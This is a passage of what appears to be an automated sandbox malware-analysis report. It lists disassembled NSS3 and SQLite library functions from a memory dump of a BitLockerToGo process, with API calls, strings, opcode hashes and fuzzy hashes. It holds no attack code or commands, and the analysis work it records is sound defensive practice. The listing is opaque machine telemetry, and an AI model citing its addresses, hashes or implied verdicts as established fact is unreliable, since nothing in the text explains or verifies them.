                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_mprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: ul$Pul$winFileSize
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4246442610-3148445840
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cf00bba4087ef66d2efeb8d764722642dd90ab8124f2447bb407e147c887bbae
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 43be42bd36483e8d3e6abffe4a6519c966ed5281d0c28b4d6e71574021b8fd3b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf00bba4087ef66d2efeb8d764722642dd90ab8124f2447bb407e147c887bbae
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01619F71A04706DBDB04EF2CC880B69B7B2FF8A314B164AA5D4158BB40DB30F956CBD9
                                                                                                                                                                                                                                                                                                                                                          Function 6C5D88D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C5D8990
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: @z^l
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-2198484750
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aa134b1f276d4c8b60ca2810bd186d8ddc7af36607e3142b4c8554ffc1530316
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 42f07b5848afab57770e98b15603c0897ccf7f7dc61701b11fb74995e2e7a23f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa134b1f276d4c8b60ca2810bd186d8ddc7af36607e3142b4c8554ffc1530316
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A551F671A057819FC704CF68C5946A6BBF0BF69308B24969DC8884BB03D371F596CBD2
                                                                                                                                                                                                                                                                                                                                                          Function 6C5E7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5E7D35
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8147c908a1a440bdec87c535eafd92e4114b53b44a23407dbfaf2c0875f7c138
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60066d53dad0474644d6dda80330352b26326013c9d3dee6480a5b1ba05d156d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8147c908a1a440bdec87c535eafd92e4114b53b44a23407dbfaf2c0875f7c138
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB311271E0422997C710CF9ECD809BAB7E5AF88345B5905A6E558B7B82D270D941C7B0
                                                                                                                                                                                                                                                                                                                                                          Function 6C5D6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C5D6D36
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C5D6D2F
                                                                                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C5D6D2A
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5D6D20
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ad6a7c0a9a99ca8fc4b4145f68c4486fe0dbd982b6c338505a9b6ef78fa2c5ca
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5ea610c25a9df746e1ad5129b41ef7536455fc0e2ece329d176968c6f483779b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad6a7c0a9a99ca8fc4b4145f68c4486fe0dbd982b6c338505a9b6ef78fa2c5ca
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E2124306003049BC710DE19ED41B5AB7F1AF84308F254D2CD8499BF50EB70F98ACBA6
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+kl,6C6B32C2,<+kl,00000000,00000000,?), ref: 6C6B2FDA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C6B300B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C6B302A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C68C45D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68C3D0: TlsGetValue.KERNEL32 ref: 6C68C494
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C68C4A9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68C3D0: PR_Unlock.NSS3(?), ref: 6C68C4F4
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                                                                                                                                                                                                                                                          • String ID: <+kl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2538134263-1840033307
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e4e7be6cb94a4fcf49dc4d1962f5f8916a4648cf9ec3dd1384227c547ebf6298
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A411E7B6B00104ABDB008E65EC00A9B77D99F85768F194134E91CD7780EB72ED16C7A9
                                                                                                                                                                                                                                                                                                                                                          Function 6C70CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C70CC7B), ref: 6C70CD7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C70CD8E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C70CDA5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C70CDB8
                                                                                                                                                                                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C70CCB5
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C7A14F4,6C7A02AC,00000090), ref: 6C70CCD3
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C7A1588,6C7A02AC,00000090), ref: 6C70CD2B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C629AC0: socket.WSOCK32(?,00000017,6C6299BE), ref: 6C629AE6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C629AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6299BE), ref: 6C629AFC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630590: closesocket.WSOCK32(6C629A8F,?,?,6C629A8F,00000000), ref: 6C630597
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                                                                                                          • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aaab91330bc38aa688a545e79bdc09da78331a4cc029f2c97f6d7df53b333666
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 591d9e4b449046203685ca7afd8fa6ccfbd165cf55aef4e71bd5df238b1c5bd9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaab91330bc38aa688a545e79bdc09da78331a4cc029f2c97f6d7df53b333666
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C81166F6B00250DFFB009FE9EA0B74A3AB89346658F541539E516CBB81EB71C4148BE6
                                                                                                                                                                                                                                                                                                                                                          Function 6C5CA8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FA480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C71C3A2,?,?,00000000,00000000), ref: 6C6FA528
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FA480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6FA6E0
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5CA94F
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C5CA948
                                                                                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C5CA943
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5CA939
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2377b9926364a879b799a87d0c8007e559379ab19bbb8d3a9d9b0ab73587e3ff
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d14ba754816ee326cdeb5063c92fef9cbe44cc32b5dfbb07bc6e54ebde161f4a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2377b9926364a879b799a87d0c8007e559379ab19bbb8d3a9d9b0ab73587e3ff
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A014931B002089BC710CBB9DD06B5BB7F5AF85308F45493DE95957A80E731AD0987A2
                                                                                                                                                                                                                                                                                                                                                          Function 6C658850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C660715), ref: 6C658859
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C658874
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C65888D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: calloc$ArenaInitLockPool
                                                                                                                                                                                                                                                                                                                                                          • String ID: NSS
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2230817933-3870390017
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cf2558c2922c2869a36a2e06ef02f5ee14c3e11409034bb6dd0f85cbc0410aff
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75031e315126647e1bd7e0ab0d514417ac5f52cc8057c02d3221cad9d576f104
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf2558c2922c2869a36a2e06ef02f5ee14c3e11409034bb6dd0f85cbc0410aff
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0F6A2E8162027F2101169AC0AB877588AF5675EF540031E90CA3FC2EB51D52983FE
                                                                                                                                                                                                                                                                                                                                                          Function 6C6EA890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,00000000,?,6C6D5F25,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EA8A3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE24
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C66D079,00000000,00000001), ref: 6C68AE5A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE7F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEB1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEC9
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,00000000,?,6C6D5F25,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EA8BA
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(%_ml,00000000,00000000,?,6C6D5F25,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EA8CF
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
